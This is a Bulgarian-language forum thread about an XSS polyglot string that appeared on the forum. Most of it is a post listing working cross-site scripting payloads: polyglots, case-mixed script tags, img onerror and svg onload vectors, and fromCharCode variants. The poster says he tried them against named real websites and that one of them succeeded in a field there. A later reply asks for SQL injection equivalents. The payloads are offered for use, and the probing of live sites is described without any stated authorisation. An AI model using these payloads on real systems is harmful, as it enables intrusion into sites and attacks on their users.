jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%

rujel

Active Member
Това опит за нещо като XSS атака ли е, която е базирана на парсване чрез последователно ползване на команди като preg_replace? Очевидно не се е получила.
 

stuklen

Well-Known Member
Търся човека който прави тези опити по сайтове.. Имаше един потребител, който се занимаваше с това. Да точно такова е.
 

s1yf0x

Well-Known Member

ReminD

Well-Known Member
Ето още от екзотичните

Код:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Код:
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
Код:
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Код:
<sCrIpt>alert(1)</ScRipt>
- това - за пример в дневник / икономедия другите никъде не минаваха, но пък мина този елементарен на едно от полетата в id.capital

Код:
<script x>
<script x>alert('XSS')<script y>
Код:
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>

Код:
#"><img src=/ onerror=alert(2)>
 

Svetliooo

Active Member
Ето още от екзотичните
//няма да цитирам кода, за да не става дълго.
Какво е значението дали ще е <script или <ScrIpT ? След като strip_tag ( и еквивалентните му в другите езици ) ще ги премахне така или иначе ... може би някъде ги премахват с preg_replace и заради това ?

Имаш ли подобни за sql injection ?
 

Горе